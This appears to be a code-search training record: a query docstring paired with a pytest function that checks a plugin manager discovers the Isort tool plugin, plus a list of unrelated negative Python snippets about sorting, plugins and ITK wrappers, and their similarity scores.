import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def __init__(self, compare=cmp):\n self.compare = compare\n self.array = []\n self.pos = {}", "def __init__(\n self,\n label : str,\n debug : bool = False,\n **kw\n ):\n super().__init__('plugin', label=label, **kw)\n\n import os, pathlib, sys\n from meerschaum.utils.warnings import error, warn\n from meerschaum.config._paths import PLUGINS_RESOURCES_PATH\n if str(PLUGINS_RESOURCES_PATH.parent) not in sys.path:\n sys.path.append(str(PLUGINS_RESOURCES_PATH.parent))\n\n self.resource_path = None\n for _plugin in os.listdir(PLUGINS_RESOURCES_PATH):\n plugin = _plugin.replace('.py', '')\n if plugin == self.label:\n self.resource_path = pathlib.Path(os.path.join(PLUGINS_RESOURCES_PATH, plugin))\n break\n if not self.resource_path:\n error(f\"Plugin '{self.label}' cannot be found. Is it installed?\")\n\n self.fetch = None\n try:\n exec(f'from plugins.{self.label} import fetch; self.fetch = fetch')\n except Exception as e:\n pass\n\n self.sync = None\n try:\n exec(f'from plugins.{self.label} import sync; self.sync = sync')\n except Exception as e:\n pass\n\n if self.fetch is None and self.sync is None:\n error(f\"Could not import `fetch()` or `sync()` methods for plugin '{self.label}'\")", "def __init__(self, *args):\n this = _libsbml.new_CompSBasePlugin(*args)\n try: self.this.append(this)\n except: self.this = this", "def plugin_class() -> Type[\"NitpickPlugin\"]:\n return TextPlugin", "def New(*args, **kargs):\n obj = itkHistogramToIntensityImageFilterHFIF2.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def insertion_sort(array, method='forloop'):\n return METHODS[method](array)", "def _new_instance(self):\n return self.__class__(self._vmodule, self._tensor_rank)", "def construct_sort_part(\n model_cls: Type[Model],\n part: str,\n case_insensitive: bool = True,\n) -> Sort:\n assert part, \"part must be a field name and + or -\"\n field = part[:-1]\n assert field, \"field is missing\"\n direction = part[-1]\n assert direction in ('+', '-'), \"part must end with + or -\"\n is_ascending = direction == '+'\n\n if field in model_cls._sorts:\n sort = model_cls._sorts[field](model_cls, is_ascending,\n case_insensitive)\n elif field in model_cls._fields:\n sort = query.FixedFieldSort(field, is_ascending, case_insensitive)\n else:\n # Flexible or computed.\n sort = query.SlowFieldSort(field, is_ascending, case_insensitive)\n return sort", "def __init__(self, input=None, ij=None, order=None, max_order=10,\r\n criterion=utils.bayesian_information_criterion, n_freqs=1024):\r\n self.data = input.data\r\n self.sampling_rate = input.sampling_rate\r\n self._n_process = input.shape[0]\r\n self._n_freqs = n_freqs\r\n self._order = order\r\n self._criterion = criterion\r\n self._max_order = max_order\r\n if ij is None:\r\n # The following gets the full list of combinations of\r\n # non-same i's and j's:\r\n x, y = np.meshgrid(np.arange(self._n_process),\r\n np.arange(self._n_process))\r\n self.ij = list(zip(x[tril_indices_from(x, -1)],\r\n y[tril_indices_from(y, -1)]))\r\n else:\r\n self.ij = ij", "def __init__(self, webif_dir, plugin):\n #self.logger = logging.getLogger(__name__)\n self.logger = plugin.logger\n self.webif_dir = webif_dir\n self.plugin = plugin\n self.tplenv = self.init_template_environment()", "def New(*args, **kargs):\n obj = itkStatisticsImageFilterID2.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def 
test_insertSort2(self):\n\t\tsortObj=insertSort()\n\t\tself.assertNotEqual(sortObj.run_sort(self.test_2[0]),self.test_2[1])", "def handle_coreutils_sort_kwargs(self, prog='sort', instream=None, **kwargs):\n pybedtools.logger.debug(\n 'BedTool.handle_coreutils_sort_kwargs() got these kwargs:\\n%s',\n pprint.pformat(kwargs))\n\n stdin = None\n\n # Decide how to send instream to sort.\n # If it's a BedTool, then get underlying stream\n if isinstance(instream, BedTool):\n instream = instream.fn\n\n # Filename? No pipe, just provide the file\n if isinstance(instream, six.string_types):\n stdin = None\n input_fn = instream\n # A generator or iterator: pipe it as a generator of lines\n else:\n stdin = (str(i) for i in instream)\n input_fn = '-'\n\n # If stream not specified, then a tempfile will be created\n if kwargs.pop('stream', None):\n tmp = None\n else:\n output = kwargs.pop('output', None)\n if output:\n tmp = output\n else:\n tmp = BedTool._tmp()\n\n additional_args = kwargs.pop('additional_args', None)\n\n # Parse the kwargs into BEDTools-ready args\n cmds = [prog]\n\n for key, value in sorted(list(kwargs.items()), reverse=True):\n if isinstance(value, bool):\n if value:\n cmds.append('--' + key)\n else:\n continue\n elif isinstance(value, list) or isinstance(value, tuple):\n value = list(map(str, value))\n\n # sort --key 1,1 --key 2,2r -k 5,5\n for val in value:\n if len(key) == 1:\n cmds.append('-' + key)\n else:\n cmds.append('--' + key)\n cmds.append(str(val))\n else:\n cmds.append('--' + key)\n cmds.append(str(value))\n\n if additional_args:\n cmds.append(additional_args)\n\n cmds.append(input_fn)\n return cmds, tmp, stdin", "def __init__(self):\n self._keys = []\n self._sortKeys = []", "def sort(self, exprs):\n self._sort_exprs = exprs\n return self", "def New(*args, **kargs):\n obj = itkHuangThresholdImageFilterISS3ISS3.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def create_parser():\n now = datetime.datetime.today()\n default_date = \"{}-{}-{}\".format(now.day, now.month, now.year)\n parser = argparse.ArgumentParser(description=\"Git plugin for automatic insertion of @since and @author annotations \"\n \"into *.java source files in a project.\",\n epilog=\"© Avner & Oded\")\n parser.add_argument(\"-v\", \"--version\", help=\"Display the version of this plugin\", action='store_true')\n parser.add_argument(\"--since\", nargs='?', help=\"Add the @since annotations to project\", const=default_date)\n parser.add_argument(\"--author\", nargs='?', help=\"Add the @author annotations to project\", const=getpass.getuser())\n\n return parser", "def __init__(self, webif_dir, plugin):\n self.logger = plugin.logger\n self.webif_dir = webif_dir\n self.plugin = plugin\n self._creds = None\n self._auth = None\n\n self.tplenv = self.init_template_environment()" ]
[ "0.5880008", "0.572811", "0.5263633", "0.5135936", "0.5086754", "0.5085847", "0.5052518", "0.5052518", "0.5028125", "0.5018764", "0.5011754", "0.49714696", "0.49462602", "0.48368236", "0.48352364", "0.4823109", "0.48152107", "0.48114508", "0.48113042", "0.479689", "0.47876537", "0.47851378", "0.47843146", "0.47635952", "0.4755802", "0.47509703", "0.4749833", "0.47206005", "0.4680351", "0.46746126", "0.46631837", "0.46548966", "0.46344376", "0.46238235", "0.4620496", "0.46195126", "0.46092921", "0.45940942", "0.4546308", "0.45396274", "0.45371294", "0.4534121", "0.45319805", "0.45319173", "0.4526805", "0.45143154", "0.45140886", "0.45009172", "0.4487294", "0.4486419", "0.44699883", "0.44635287", "0.4462118", "0.4461933", "0.44563553", "0.44478616", "0.44462118", "0.44459984", "0.4443109", "0.44430462", "0.44356376", "0.4428438", "0.44216046", "0.4420869", "0.4404056", "0.43998334", "0.43963715", "0.43947834", "0.43944824", "0.4392197", "0.43864635", "0.4383929", "0.43772188", "0.43746927", "0.43742737", "0.43675026", "0.43667853", "0.4363298", "0.43606964", "0.43528897", "0.43522048", "0.43406022", "0.43341544", "0.43328393", "0.4324247", "0.432101", "0.4309011", "0.43078488", "0.43075755", "0.43074673", "0.43072623", "0.42945528", "0.4293544", "0.42897135", "0.42888305", "0.42793787", "0.4276515", "0.42762154", "0.42708898", "0.4267183" ]
0.59617186
0
Test that the plugin manager can find the Isort plugin.
def test_isort_tool_plugin_found(): if sys.version_info.major == 3 and sys.version_info.minor < 6: pytest.skip("isort is only available for Python 3.6+, unable to test") manager = PluginManager() # Get the path to statick_tool/__init__.py, get the directory part, and # add 'plugins' to that to get the standard plugins dir manager.setPluginPlaces( [os.path.join(os.path.dirname(statick_tool.__file__), "plugins")] ) manager.setCategoriesFilter( { "Tool": ToolPlugin, } ) manager.collectPlugins() # Verify that a plugin's get_name() function returns "isort" assert any( plugin_info.plugin_object.get_name() == "isort" for plugin_info in manager.getPluginsOfCategory("Tool") ) # While we're at it, verify that a plugin is named Isort Tool Plugin assert any( plugin_info.name == "Isort Tool Plugin" for plugin_info in manager.getPluginsOfCategory("Tool") )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_plugins(self):\n from omtk import plugin_manager\n pm = plugin_manager.plugin_manager\n\n loaded_plugin_names = [plugin.cls.__name__ for plugin in pm.get_loaded_plugins_by_type('modules')]\n\n builtin_plugin_names = (\n 'Arm',\n 'FK',\n 'AdditiveFK',\n 'AvarGrpOnSurface',\n 'FaceBrow',\n 'FaceEyeLids',\n 'FaceEyes',\n 'FaceJaw',\n 'FaceLips',\n 'FaceNose',\n 'FaceSquint',\n 'Hand',\n 'Head',\n 'IK',\n 'InteractiveFK',\n 'Leg',\n 'LegQuad',\n 'Limb',\n 'Neck',\n 'Ribbon',\n 'SplineIK',\n 'Twistbone',\n )\n\n for plugin_name in builtin_plugin_names:\n self.assertIn(plugin_name, loaded_plugin_names)", "def test_plugins():\n assert plugins.template.plugin_test() == True\n assert plugin_test() == True", "def test(self, plugin):\n plug = plugin_source.load_plugin(plugin)\n plug.test()", "def test_plugin_initialize(self):\n p = PluginCustom()\n self.assertEqual('youpie', p.toto)", "def test_discoverable(self):\r\n plugins = getPlugins(IProcessor)\r\n lmath = [p for p in plugins if p.name == \"mlore\"]\r\n self.assertEqual(len(lmath), 1, \"Did not find math lore plugin: %r\" % (lmath,))", "def test_make_tool_plugin_found():\n manager = PluginManager()\n # Get the path to statick_tool/__init__.py, get the directory part, and\n # add 'plugins' to that to get the standard plugins dir\n manager.setPluginPlaces([os.path.join(os.path.dirname(statick_tool.__file__),\n 'plugins')])\n manager.setCategoriesFilter({\n \"Tool\": ToolPlugin,\n })\n manager.collectPlugins()\n # Verify that a plugin's get_name() function returns \"make\"\n assert any(plugin_info.plugin_object.get_name() == 'make' for\n plugin_info in manager.getPluginsOfCategory(\"Tool\"))\n # While we're at it, verify that a plugin is named Yamllint Tool Plugin\n assert any(plugin_info.name == 'Make Tool Plugin' for\n plugin_info in manager.getPluginsOfCategory(\"Tool\"))", "def test_register_dynamic_plugin(self):\n pass", "def test_rstlint_tool_plugin_found():\n manager = PluginManager()\n # Get the path to statick_tool/__init__.py, get the directory part, and\n # add 'plugins' to that to get the standard plugins dir\n manager.setPluginPlaces(\n [os.path.join(os.path.dirname(statick_tool.__file__), \"plugins\")]\n )\n manager.setCategoriesFilter(\n {\n \"Tool\": ToolPlugin,\n }\n )\n manager.collectPlugins()\n # Verify that a plugin's get_name() function returns \"rstlint\"\n assert any(\n plugin_info.plugin_object.get_name() == \"rstlint\"\n for plugin_info in manager.getPluginsOfCategory(\"Tool\")\n )\n # While we're at it, verify that a plugin is named rstlint Tool Plugin\n assert any(\n plugin_info.name == \"rstlint Tool Plugin\"\n for plugin_info in manager.getPluginsOfCategory(\"Tool\")\n )", "def test_register_dynamic_plugin_manager(self):\n pass", "def test_exposeInterfaces(self):\n if self.plugin is None:\n return\n\n cs = settings.Settings()\n results = self.plugin.exposeInterfaces(cs)\n if results is None or not results:\n return\n\n # each plugin should return a list\n self.assertIsInstance(results, list)\n for result in results:\n # Make sure that all elements in the list satisfy the constraints of the\n # hookspec\n self.assertIsInstance(result, tuple)\n self.assertEqual(len(result), 3)\n\n order, interface, kwargs = result\n\n self.assertIsInstance(order, (int, float))\n self.assertTrue(issubclass(interface, interfaces.Interface))\n self.assertIsInstance(kwargs, dict)", "def test_isort(self):\n chdir(REPO_ROOT)\n cmd = [\"isort\", \"-df\", \"-rc\", \"-c\", *SRC_DIRS]\n print(\"running:\", \" \".join(str(part) for 
part in cmd))\n proc = run(cmd, capture_output=True)\n assert proc.returncode == 0, f\"isort issues:\\n{proc.stdout.decode('utf-8')}\"", "def load_plugin():\n return HostTestPluginCopyMethod_Shell()", "def test_isort_tool_plugin_parse_valid():\n itp = setup_isort_tool_plugin()\n total_output = []\n output = \"/tmp/x.py\"\n total_output.append(output)\n output = \"/tmp/y.py\"\n total_output.append(output)\n issues = itp.parse_output(total_output)\n assert len(issues) == 2\n assert issues[0].filename == \"/tmp/x.py\"\n assert issues[0].line_number == \"0\"\n assert issues[0].tool == \"isort\"\n assert issues[0].issue_type == \"formatting\"\n assert issues[0].severity == \"3\"\n assert issues[0].message == \"Imports are incorrectly sorted and/or formatted.\"\n assert issues[1].filename == \"/tmp/y.py\"", "def test_plugin_retrieval(self):\n plugin = ProjectAppPluginPoint.get_plugin(PLUGIN_NAME)\n self.assertIsNotNone(plugin)\n self.assertEqual(plugin.get_model().name, PLUGIN_NAME)\n self.assertEqual(plugin.name, PLUGIN_NAME)\n self.assertEqual(plugin.get_model().title, PLUGIN_TITLE)\n self.assertEqual(plugin.title, PLUGIN_TITLE)\n self.assertEqual(plugin.entry_point_url_id, PLUGIN_URL_ID)", "def test_register_dynamic_plugin_manager1(self):\n pass", "def test_register_dynamic_plugin1(self):\n pass", "def test_remote_plugin(self):\n plugin_name = 'Slack'\n Plugin.download_plugin(plugin_name)\n target = os.path.join(expanduser('~'), '.drupdates', 'plugins', plugin_name)\n plugins = Plugin.get_plugins()\n assert plugins[plugin_name]['info'][1] == os.path.join(target, '__init__.py')", "def test_get_plugin_by_id(self):\n response = self.client.get_plugin_by_id(1)\n self.assertEqual(response['id'], 1)", "def testSorting(self):\n if self.sorting in tools.SORTINGS:\n self.assertEqual(\n self.sorting,\n self.config.sorting\n )\n else:\n self.assertNotEqual(\n self.sorting,\n self.config.sorting\n )\n self.assertEqual(\n tools.SORTING_DEFAULT,\n self.config.sorting\n )", "def test_parrot_imported():\n assert \"parrot\" in sys.modules", "def test_custom_plugin(self):\n plugin_name = 'Druptest'\n source = os.path.join(self.current_dir, 'classes', plugin_name)\n target = os.path.join(expanduser('~'), '.drupdates', 'plugins', plugin_name)\n shutil.copytree(source, target)\n plugins = Plugin.get_plugins()\n assert plugins[plugin_name]['name'] == plugin_name", "def test_get_plugins_with_search_args(self):\n response = self.client.get_plugins({'name_exact': \"pl-dircopy\"})\n self.assertEqual(response['data'][0]['name'], \"pl-dircopy\")", "def sorter(Plugin):\n return Plugin.order", "def get_plugin_interface(self):", "def test_plugin_initialize_from_args(self):\n sys.argv.append('-t')\n p = PluginCustom()\n self.assertEqual('yourah', p.toto)", "def test_plugin_slowinit(node_factory):\n n = node_factory.get_node()\n\n n.rpc.plugin_start(os.path.join(os.getcwd(), \"tests/plugins/slow_init.py\"))\n\n # It's not actually configured yet, see what happens;\n # make sure 'rescan' and 'list' controls dont crash\n n.rpc.plugin_rescan()\n n.rpc.plugin_list()", "def test_install_plugin_again_is_ok(self):\n raise NotImplementedError()", "def setup_isort_tool_plugin(custom_rsc_path=None):\n arg_parser = argparse.ArgumentParser()\n\n if custom_rsc_path is not None:\n resources = Resources([custom_rsc_path])\n else:\n resources = Resources(\n [os.path.join(os.path.dirname(statick_tool.__file__), \"plugins\")]\n )\n config = Config(resources.get_file(\"config.yaml\"))\n plugin_context = PluginContext(arg_parser.parse_args([]), 
resources, config)\n plugin_context.args.output_directory = os.path.dirname(__file__)\n itp = IsortToolPlugin()\n itp.set_plugin_context(plugin_context)\n return itp", "def test_plugin_urls(self):\n plugin = ProjectAppPluginPoint.get_plugin(PLUGIN_NAME)\n self.assertEqual(plugin.urls, urlpatterns)", "def isort(context):\n exec_cmd = \"isort . --check --diff\"\n run_cmd(context, exec_cmd)", "def test_installed(self):\n check_output('unity --help', shell=True)", "def test_specific_plugin_installed(self):\n self._add_plugin(self.jigconfig, 'plugin01')\n set_jigconfig(self.gitrepodir, config=self.jigconfig)\n\n # Create staged\n self.commit(self.gitrepodir, 'a.txt', 'a')\n self.stage(self.gitrepodir, 'b.txt', 'b')\n\n with nested(\n patch('jig.runner.sys'),\n self.assertRaises(SystemExit)\n ) as (r_sys, ec):\n # Raise the error to halt execution like the real sys.exit would\n r_sys.exit.side_effect = SystemExit\n\n self.run_command('--plugin plugin01 {0}'.format(self.gitrepodir))\n\n self.assertResults(u\"\"\"\n ▾ plugin01\n\n ⚠ line 1: b.txt\n b is +\n\n {0} Jig ran 1 plugin\n Info 0 Warn 1 Stop 0\n \"\"\".format(ATTENTION), self.output)", "def test_commands_initialization(bot):\n plugin = Commands(bot)\n assert isinstance(plugin, Commands)\n assert plugin.bot == bot", "def test_filter_installed_plugins(plugin_dialog):\n plugin_dialog.filter(\"\")\n assert plugin_dialog.installed_list._count_visible() >= 0\n\n plugin_dialog.filter(\"no-match@123\")\n assert plugin_dialog.installed_list._count_visible() == 0", "def test_implements_IHelper(self):\n self.assertTrue(IHelper.providedBy(PersistenceHelper()))", "def test_fabsim():\n assert(\"plugins\" in get_plugin_path(\"FabDummy\"))\n assert(\"FabDummy\" in get_plugin_path(\"FabDummy\"))\n assert(len(get_fabsim_git_hash()) > 0)", "def test_sort(self):\n sort_field = MoveSearchForm.sort\n for value, label in sort_field.kwargs['choices']:\n response = self.do_search(id=u'1', sort=value)\n self.assert_(\n response.tmpl_context.results,\n \"\"\"Sort by {0} doesn't crash\"\"\".format(value)\n )", "def isort(command, checkonly=False):\n print(\n \"\"\"\nRunning isort the Python code import sorter\n===========================================\n\"\"\"\n )\n cmd = \"isort --check-only --diff .\" if checkonly else \"isort .\"\n command.run(cmd, echo=True, pty=POSIX)", "def test_insertSort(self):\n\t\tsortObj=insertSort()\n\t\tself.assertEqual(sortObj.run_sort(self.test_1[0]),self.test_1[1])", "def test_isort_tool_plugin_scan_oserror(mock_subprocess_check_output):\n mock_subprocess_check_output.side_effect = OSError(\"mocked error\")\n itp = setup_isort_tool_plugin()\n package = Package(\n \"valid_package\", os.path.join(os.path.dirname(__file__), \"valid_package\")\n )\n package[\"python_src\"] = [\n os.path.join(os.path.dirname(__file__), \"valid_package\", \"sample.py\")\n ]\n issues = itp.scan(package, \"level\")\n assert not issues", "def test_insertSort3(self):\n\t\tsortObj=insertSort()\n\t\tself.assertEqual(sortObj.run_sort(self.test_3[0]),self.test_3[1])", "def test_plugin_with_no_plugin_class(conf):\n # For fun, we pass in a system library\n installed_apps_before = conf.config[\"INSTALLED_APPS\"][:]\n cli.plugin(\"os.path\")\n assert installed_apps_before == conf.config[\"INSTALLED_APPS\"]", "def test_client_custom_plugin():\n client = ConfigureClients(plugins=[PluginVipCustomisation])\n assert client.plugins == [PluginVipCustomisation]", "def test_make_tool_plugin_scan_missing_tool_name():\n mtp = setup_make_tool_plugin()\n if not 
mtp.command_exists('make'):\n pytest.skip('Missing make executable.')\n package = Package('valid_package', os.path.join(os.path.dirname(__file__),\n 'valid_package'))\n issues = mtp.scan(package, 'level')\n assert not issues", "def test__SortOrder__name():\n for instance in SortOrder.INSTANCES.values():\n vampytest.assert_instance(instance.name, str)", "def test_create_plugin_instance(self):\n plugin_id = 2\n data = {\n 'title': 'Test plugin instance',\n 'dir': self.username + '/'\n }\n response = self.client.create_plugin_instance(plugin_id, data)\n self.assertEqual(response['title'], data['title'])", "def test_module(self):\n pass", "def test_get_sort_info(self):\n ars = self.ar[2009][11]['day']\n self.assertEqual(ars.get_sort_info(), (31, 'key', True))", "def test_xchemOT_imported():\n assert \"xchemOT\" in sys.modules", "def check_plugin(vcf_reader, plugin):\n # Always use core plug-in\n plugins = ['core']\n # Collect supplied plugin(s)\n [plugins.append(item) for item in plugin]\n # Create set\n plugins = list(set(plugins))\n # Evaluate vcf and plugin compatibility\n for plugin in plugins:\n\n if plugin == \"core\":\n from pScout.plugin.plugin_reader import core\n ret = core(vcf_reader, \"pScout/plugin/get_core.ini\")\n\n if ret is 1: # Not compatible\n exit()\n\n return plugins", "def setUp(self):\n self._plugin = spotlight_volume.SpotlightVolumePlugin()\n self._parser = plist.PlistParser()", "def request_plugins(self):", "def scan_plugin(self):\n pluginpath=_module_path()\n plugins=[]\n for f in os.listdir(pluginpath):\n if os.path.isfile(os.path.join(pluginpath,f)) and os.path.splitext(os.path.join(pluginpath,f))[-1]=='.py' :\n if 'plugin_' in os.path.basename(f):\n logger.debug(\"found plugin : %s\",f)\n plugins.append(f)\n return plugins", "def test_filter_available_plugins(plugin_dialog):\n plugin_dialog.filter(\"\")\n assert plugin_dialog.available_list.count() == 2\n assert plugin_dialog.available_list._count_visible() == 2\n\n plugin_dialog.filter(\"no-match@123\")\n assert plugin_dialog.available_list._count_visible() == 0\n\n plugin_dialog.filter(\"\")\n plugin_dialog.filter(\"test-name-0\")\n assert plugin_dialog.available_list._count_visible() == 1", "def test_dependencies_installed(self):\n installer = getattr(self.portal, 'portal_quickinstaller')\n self.assertTrue(installer.isProductInstalled('plone.app.dexterity'))", "def test_get_plugin_parameters(self):\n plugin_id = 2\n response = self.client.get_plugin_parameters(plugin_id,\n {'limit': 50, 'offset': 0})\n self.assertEqual(response['data'][0]['name'], \"dir\")", "def get_id(self):\n return \"unittest_required_plugin\"", "def test_addplugin(self):\n app = QApplication(sys.argv)\n data = (np.random.rand(30, 31, 32) * 100).astype(np.int)\n data[15:40, 13:20, 10:18] += 50\n se = seededitorqt.QTSeedEditor(data)\n wg0 = seededitorqt.plugin.SampleThresholdPlugin()\n se.addPlugin(wg0)\n # se.exec_()\n # self.assertTrue(False)", "def plugins():\n pass", "def main() -> bool:\n global logger\n logger = setup_logger(\"nitpycker\")\n plugin_manager = Manager()\n plugin_manager.load_plugins()\n args = parse_args(plugin_manager)\n if plugin_manager.enable_plugins(args.plugins, args):\n exit(2)\n\n plugin_manager.pre_test_discovery()\n tests = unittest.defaultTestLoader.discover(args.start_directory, pattern=args.pattern)\n plugin_manager.post_test_discovery()\n tests = plugin_manager.filter_tests(tests)\n report = ParallelRunner(plugin_manager, process_number=args.process_number, verbosity=args.verbosity).run(tests)\n return not 
report.wasSuccessful()", "def test_insertSort2(self):\n\t\tsortObj=insertSort()\n\t\tself.assertNotEqual(sortObj.run_sort(self.test_2[0]),self.test_2[1])", "def test_plot_ay_imported():\n assert \"plot_ay\" in sys.modules", "def test_load(self):\n (spec, check) = bundylogging.load()\n # It returns the checking function\n self.assertEqual(check, bundylogging.check)\n # The plugin stores it's spec\n self.assertEqual(spec, bundylogging.spec)", "def plugin_import(plugin):\n\n return importlib.import_module(plugin, package=\"directord\")", "def test_first_run(dbbackup, plugin, update, version_file=None, orig_version=None):\n\n if version_file:\n os.unlink(version_file)\n\n cli.initialize()\n update.assert_called_once()\n dbbackup.assert_not_called()\n\n # Check that it got called for each default plugin\n from kolibri.core.settings import DEFAULT_PLUGINS\n\n assert plugin.call_count == len(DEFAULT_PLUGINS)", "def test_plugin_command(node_factory):\n n = node_factory.get_node()\n\n # Make sure that the 'hello' command from the helloworld.py plugin\n # is not available.\n cmd = [hlp for hlp in n.rpc.help()[\"help\"] if \"hello\" in hlp[\"command\"]]\n assert(len(cmd) == 0)\n\n # Add the 'contrib/plugins' test dir\n n.rpc.plugin_startdir(directory=os.path.join(os.getcwd(), \"contrib/plugins\"))\n # Make sure that the 'hello' command from the helloworld.py plugin\n # is now available.\n cmd = [hlp for hlp in n.rpc.help()[\"help\"] if \"hello\" in hlp[\"command\"]]\n assert(len(cmd) == 1)\n\n # Make sure 'rescan' and 'list' subcommands dont crash\n n.rpc.plugin_rescan()\n n.rpc.plugin_list()\n\n # Make sure the plugin behaves normally after stop and restart\n assert(\"Successfully stopped helloworld.py.\" == n.rpc.plugin_stop(plugin=\"helloworld.py\")[''])\n n.daemon.wait_for_log(r\"Killing plugin: helloworld.py\")\n n.rpc.plugin_start(plugin=os.path.join(os.getcwd(), \"contrib/plugins/helloworld.py\"))\n n.daemon.wait_for_log(r\"Plugin helloworld.py initialized\")\n assert(\"Hello world\" == n.rpc.call(method=\"hello\"))\n\n # Now stop the helloworld plugin\n assert(\"Successfully stopped helloworld.py.\" == n.rpc.plugin_stop(plugin=\"helloworld.py\")[''])\n n.daemon.wait_for_log(r\"Killing plugin: helloworld.py\")\n # Make sure that the 'hello' command from the helloworld.py plugin\n # is not available anymore.\n cmd = [hlp for hlp in n.rpc.help()[\"help\"] if \"hello\" in hlp[\"command\"]]\n assert(len(cmd) == 0)\n\n # Test that we cannot start a plugin with 'dynamic' set to False in\n # getmanifest\n with pytest.raises(RpcError, match=r\"Not a dynamic plugin\"):\n n.rpc.plugin_start(plugin=os.path.join(os.getcwd(), \"tests/plugins/static.py\"))\n\n # Test that we cannot stop a started plugin with 'dynamic' flag set to\n # False\n n2 = node_factory.get_node(options={\n \"plugin\": os.path.join(os.getcwd(), \"tests/plugins/static.py\")\n })\n with pytest.raises(RpcError, match=r\"static.py cannot be managed when lightningd is up\"):\n n2.rpc.plugin_stop(plugin=\"static.py\")\n\n # Test that we don't crash when starting a broken plugin\n with pytest.raises(RpcError, match=r\"Timed out while waiting for plugin response\"):\n n2.rpc.plugin_start(plugin=os.path.join(os.getcwd(), \"tests/plugins/broken.py\"))", "def test_package(self):\n pass", "def register_plugin(self):\n self.edit_goto.connect(self.main.editor.load)\n self.redirect_stdio.connect(self.main.redirect_internalshell_stdio)\n self.main.add_dockwidget(self)\n\n unittesting_act = create_action(self, _(\"Run unit tests\"),\n 
icon=get_icon('profiler.png'),\n triggered=self.run_unittesting)\n unittesting_act.setEnabled(is_unittesting_installed())\n fixed_shortcut(\"Ctrl+Shift+F11\", self.main,\n self.run_unittesting)\n\n self.main.run_menu_actions += [unittesting_act]\n self.main.editor.pythonfile_dependent_actions += [unittesting_act]", "def describe(self, plugin):\n plug = plugin_source.load_plugin(plugin)\n plug.describe()", "def test_version_sorting(self):\n assert natsort(['1', '5', '10', '50']) == ['1', '5', '10', '50']", "def test(self):\n test_dir = join_path(self.test_suite.current_test_cache_dir, self.test_src_dir)\n self.run_test(\n \"sh\",\n [\"testshortsort.sh\"],\n expected=\"Alignments sorted by coordinate.\",\n purpose=\"test: checking alignments\",\n work_dir=test_dir,\n )", "def test_makeplugin(subprocess):\n # type: (Mock) -> None\n plugin = lektor_make.MakePlugin(lambda: None, None) # pragma: no branch\n plugin.on_before_build_all(lambda: None) # pragma: no branch\n subprocess.Popen.assert_called_with([\"make\", \"lektor\"])\n subprocess.Popen().wait.asset_called()", "def test_install_terraform_plugin_1(monkeypatch):\n monkeypatch.setattr(os, 'listdir', lambda path: [\n 'terraform-provider-terraform_v0.11.2_x4'])\n monkeypatch.setattr(os, 'remove', lambda path: True)\n monkeypatch.setattr(os, 'chmod', lambda path, permissions: True)\n\n monkeypatch.setattr(shutil, 'copy2', lambda src, dest: True)\n\n def mp_check_output(cmd):\n if cmd == ['which', 'terraform']:\n return b'/usr/local/bin/terraform\\n'\n\n if cmd == ['terraform', '-v']:\n return b'Terraform v0.11.3\\n\\n'\n\n raise Exception('Unmocked command: %s' % cmd)\n\n monkeypatch.setattr(subprocess, 'check_output', mp_check_output)\n\n install_terraform_plugin('/tmp/stone-burner_plugins')", "def __test__():\n#-------------------------------------------------------------------------------\n import pylib.tester as tester\n return 0", "def test_install(self):\n pass", "def test_implements_IHelper(self):\n self.assertTrue(IHelper.providedBy(WorkerHelper()))", "def test_vendored_libjuju(self):\n for name in sys.modules:\n if name.startswith(\"juju\"):\n module = sys.modules[name]\n if getattr(module, \"__file__\"):\n print(getattr(module, \"__file__\"))\n assert re.search('n2vc', module.__file__, re.IGNORECASE)\n\n # assert module.__file__.find(\"N2VC\")\n # assert False\n return", "def test_specific_plugin_not_installed(self):\n self._add_plugin(self.jigconfig, 'plugin01')\n set_jigconfig(self.gitrepodir, config=self.jigconfig)\n\n # Create staged\n self.commit(self.gitrepodir, 'a.txt', 'a')\n self.stage(self.gitrepodir, 'b.txt', 'b')\n\n with nested(\n patch('jig.runner.sys'),\n self.assertRaises(SystemExit)\n ) as (r_sys, ec):\n # Raise the error to halt execution like the real sys.exit would\n r_sys.exit.side_effect = SystemExit\n\n self.run_command(\n '--plugin notinstalled {0}'.format(self.gitrepodir))\n\n # A plugin which is not installed was requested so not output\n self.assertEqual('', self.output)", "def test_molssi_project_imported():\n assert \"molssi_project\" in sys.modules", "def test_provider(self):\n msg = 'Wrong number of processing algorithm loaded.'\n self.assertEqual(len(self.provider.alglist), 6, msg)\n\n msg = 'InaSAFE should be activated by default in Processing.'\n self.assertEqual(self.provider.activate, True, msg)\n\n msg = 'Wrong processing provide.'\n for algorithm in self.provider.alglist:\n self.assertEqual(algorithm.provider, self.provider, msg)", "def test_import(self):\n 
self.assertTrue(NagiosPerfdataCollector)", "def test(self):\n\t\treturn describeInterface(self)", "def get_plugin(self, name):", "def test_setup_object(self):\n self._test_object.__name__ = 'pluggable_object'\n self._test_object.test_plugin = object()\n self._test_object.__all__ = ['test_plugin']\n pluggable_package.setup(self._test_object)\n self._test_setup(self._test_object)", "def test():\n try:\n import nipype\n except ImportError:\n # if nipype is not installed, skip this test (without failure)\n return True\n suite = unittest.TestLoader().loadTestsFromTestCase(TestNipypeWrap)\n runtime = unittest.TextTestRunner(verbosity=2).run(suite)\n return runtime.wasSuccessful()", "def test_get_plugin_id(self):\n plugin_name = 'myfakeplugin'\n self.my_plugin.name = plugin_name\n\n def side_effect(name):\n if name == plugin_name:\n return self.my_plugin\n else:\n raise sahara_base.APIException(error_code=404,\n error_name='NOT_FOUND')\n\n self.sahara_client.plugins.get.side_effect = side_effect\n self.assertIsNone(self.sahara_plugin.get_plugin_id(plugin_name))\n self.assertRaises(exception.EntityNotFound,\n self.sahara_plugin.get_plugin_id, 'noplugin')\n\n calls = [mock.call(plugin_name), mock.call('noplugin')]\n self.sahara_client.plugins.get.assert_has_calls(calls)", "def test_molecool_imported():\n assert \"molecool\" in sys.modules", "def test_check_module(self) -> None:\n check_module(\"os\")", "def init_plugins(group):\n package = sys.modules[__name__]\n\n for (importer, module_name, ispkg) in pkgutil.iter_modules(package.__path__):\n if not ispkg:\n try:\n module = importlib.import_module(package.__name__ + '.' + module_name)\n\n if 'run' not in module.__dict__:\n print_fail('Plugin command \"%s\" doesn\\'t provide a \"run\" method. Aborting.' % (module_name))\n # sys.exit(-1)\n else:\n 